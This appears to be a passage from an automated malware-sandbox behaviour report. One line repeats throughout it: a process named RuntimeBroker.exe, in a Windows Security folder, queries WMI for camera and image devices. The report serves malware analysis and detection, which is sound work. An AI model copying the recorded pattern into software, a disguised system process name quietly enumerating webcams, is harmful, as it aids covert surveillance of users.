                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
